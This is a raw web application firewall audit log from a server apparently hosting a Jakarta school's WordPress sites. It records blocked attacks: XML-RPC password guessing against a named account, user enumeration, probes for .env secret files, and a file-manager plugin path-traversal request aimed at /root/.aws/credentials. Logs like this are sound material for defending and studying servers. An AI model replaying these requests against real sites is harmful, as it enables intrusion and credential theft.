proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749873255254834 4242 (- - -) Stopwatch2: 1749873255254834 4242; combined=3277, p1=343, p2=2769, p3=0, p4=0, p5=98, sr=76, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d42c244-Z-- --f528883b-A-- [14/Jun/2025:10:54:39 +0700] aEzyf2IDXuKmWNi2UBS6QgAAAFY 103.236.140.4 49724 103.236.140.4 8181 --f528883b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f528883b-C-- wp.getUsersBlogs kresno !@#1234 --f528883b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f528883b-E-- --f528883b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (67+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749873279138383 4221 (- - -) Stopwatch2: 1749873279138383 4221; combined=3236, p1=350, p2=2612, p3=0, p4=0, p5=150, sr=82, sw=124, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f528883b-Z-- --c941c34b-A-- [14/Jun/2025:10:55:39 +0700] aEzyu0MWfhkd5Y0sFtrzNgAAAIw 103.236.140.4 49946 103.236.140.4 8181 --c941c34b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c941c34b-C-- wp.getUsersBlogs kresno softball --c941c34b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c941c34b-E-- --c941c34b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (110+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749873339831748 5003 (- - -) Stopwatch2: 1749873339831748 5003; combined=3631, p1=406, p2=3054, p3=0, p4=0, p5=101, sr=86, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c941c34b-Z-- --1c27f851-A-- [14/Jun/2025:10:56:11 +0700] aEzy22IDXuKmWNi2UBS6gAAAAEs 103.236.140.4 50072 103.236.140.4 8181 --1c27f851-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.108.116.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.108.116.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1c27f851-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c27f851-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749873371011827 2055 (- - -) Stopwatch2: 1749873371011827 2055; combined=998, p1=339, p2=632, p3=0, p4=0, p5=27, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c27f851-Z-- --5a17ac20-A-- [14/Jun/2025:10:56:39 +0700] aEzy90MWfhkd5Y0sFtrzngAAAIE 103.236.140.4 50164 103.236.140.4 8181 --5a17ac20-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5a17ac20-C-- wp.getUsersBlogs kresno dakota --5a17ac20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a17ac20-E-- --5a17ac20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (103+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749873399221065 4303 (- - -) Stopwatch2: 1749873399221065 4303; combined=3360, p1=380, p2=2809, p3=0, p4=0, p5=100, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a17ac20-Z-- --99d49661-A-- [14/Jun/2025:10:57:39 +0700] aEzzM0MWfhkd5Y0sFtrzwgAAAI0 103.236.140.4 50262 103.236.140.4 8181 --99d49661-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --99d49661-C-- wp.getUsersBlogs kresno manchester --99d49661-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99d49661-E-- --99d49661-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (44+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749873459209700 4253 (- - -) Stopwatch2: 1749873459209700 4253; combined=3288, p1=344, p2=2775, p3=0, p4=0, p5=98, sr=79, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99d49661-Z-- --7ea9fe65-A-- [14/Jun/2025:10:58:39 +0700] aEzzb0MWfhkd5Y0sFtr0BQAAAI4 103.236.140.4 50414 103.236.140.4 8181 --7ea9fe65-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7ea9fe65-C-- wp.getUsersBlogs kresno a12345 --7ea9fe65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ea9fe65-E-- --7ea9fe65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (67+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749873519213697 4102 (- - -) Stopwatch2: 1749873519213697 4102; combined=3164, p1=352, p2=2646, p3=0, p4=0, p5=97, sr=81, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ea9fe65-Z-- --9f618e1a-A-- [14/Jun/2025:11:22:04 +0700] aEz47EMWfhkd5Y0sFtr0LAAAAJc 103.236.140.4 50556 103.236.140.4 8181 --9f618e1a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.118.104.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.118.104.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9f618e1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f618e1a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749874924944128 2943 (- - -) Stopwatch2: 1749874924944128 2943; combined=1293, p1=432, p2=826, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f618e1a-Z-- --55544c2e-A-- [14/Jun/2025:12:48:03 +0700] aE0NE0MWfhkd5Y0sFtr7VQAAAJM 103.236.140.4 59462 103.236.140.4 8181 --55544c2e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.211.253.158 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.211.253.158 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --55544c2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55544c2e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749880083935679 3121 (- - -) Stopwatch2: 1749880083935679 3121; combined=1344, p1=444, p2=864, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55544c2e-Z-- --1d84800b-A-- [14/Jun/2025:12:50:44 +0700] aE0NtF3g_boun6Rx5jLXQgAAANM 103.236.140.4 59592 103.236.140.4 8181 --1d84800b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.58.159.139 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.58.159.139 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --1d84800b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d84800b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749880244618685 844 (- - -) Stopwatch2: 1749880244618685 844; combined=348, p1=292, p2=0, p3=0, p4=0, p5=56, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d84800b-Z-- --62ef790f-A-- [14/Jun/2025:13:06:28 +0700] aE0RZF3g_boun6Rx5jLXTgAAAM0 103.236.140.4 59710 103.236.140.4 8181 --62ef790f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.250.193.51 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.250.193.51 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --62ef790f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62ef790f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749881188994055 2667 (- - -) Stopwatch2: 1749881188994055 2667; combined=1216, p1=437, p2=750, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62ef790f-Z-- --19667410-A-- [14/Jun/2025:13:41:08 +0700] aE0ZhF3g_boun6Rx5jLZsQAAAMc 103.236.140.4 40074 103.236.140.4 8181 --19667410-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 64.225.75.246 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 64.225.75.246 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --19667410-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --19667410-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749883268863681 816 (- - -) Stopwatch2: 1749883268863681 816; combined=316, p1=275, p2=0, p3=0, p4=0, p5=41, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19667410-Z-- --a06be00c-A-- [14/Jun/2025:15:25:15 +0700] aE0x60MWfhkd5Y0sFtobmgAAAIU 103.236.140.4 36048 103.236.140.4 8181 --a06be00c-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 167.172.232.142 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 167.172.232.142 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --a06be00c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a06be00c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749889515325014 881 (- - -) Stopwatch2: 1749889515325014 881; combined=353, p1=311, p2=0, p3=0, p4=0, p5=42, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a06be00c-Z-- --6ef0bf1e-A-- [14/Jun/2025:15:51:53 +0700] aE04KWmwZ6YUkjOdtI79xwAAABQ 103.236.140.4 34100 103.236.140.4 8181 --6ef0bf1e-B-- GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php?cmd=file&target=l1_Ly4uLy4uLy4uLy4uLy4uLy4uLy4uL3Jvb3QvLmF3cy9jcmVkZW50aWFscw== HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180458151 --6ef0bf1e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6ef0bf1e-E-- --6ef0bf1e-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891113510538 4597 (- - -) Stopwatch2: 1749891113510538 4597; combined=2729, p1=480, p2=2218, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ef0bf1e-Z-- --59296a32-A-- [14/Jun/2025:15:52:04 +0700] aE04NEMWfhkd5Y0sFtogrwAAAII 103.236.140.4 34314 103.236.140.4 8181 --59296a32-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180458247 --59296a32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --59296a32-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891124212169 817 (- - -) Stopwatch2: 1749891124212169 817; combined=337, p1=295, p2=0, p3=0, p4=0, p5=42, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59296a32-Z-- --13f8843e-A-- [14/Jun/2025:15:52:05 +0700] aE04NUMWfhkd5Y0sFtogsgAAAIo 103.236.140.4 34336 103.236.140.4 8181 --13f8843e-B-- GET /.env.local HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180458256 --13f8843e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --13f8843e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891125129690 892 (- - -) Stopwatch2: 1749891125129690 892; combined=336, p1=297, p2=0, p3=0, p4=0, p5=39, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13f8843e-Z-- --5c52c046-A-- [14/Jun/2025:15:52:06 +0700] aE04NmmwZ6YUkjOdtI79-QAAAAM 103.236.140.4 34358 103.236.140.4 8181 --5c52c046-B-- GET /.env.production HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180458265 --5c52c046-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5c52c046-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891126097794 805 (- - -) Stopwatch2: 1749891126097794 805; combined=322, p1=276, p2=0, p3=0, p4=0, p5=45, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c52c046-Z-- --192c9342-A-- [14/Jun/2025:15:52:08 +0700] aE04OEMWfhkd5Y0sFtogtQAAAJQ 103.236.140.4 34400 103.236.140.4 8181 --192c9342-B-- GET /wp-content/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180458282 --192c9342-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --192c9342-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891128097469 752 (- - -) Stopwatch2: 1749891128097469 752; combined=306, p1=268, p2=0, p3=0, p4=0, p5=38, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --192c9342-Z-- --cf07d92d-A-- [14/Jun/2025:15:52:08 +0700] aE04OEMWfhkd5Y0sFtoguAAAAJg 103.236.140.4 34418 103.236.140.4 8181 --cf07d92d-B-- GET /application/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373452 --cf07d92d-F-- HTTP/1.1 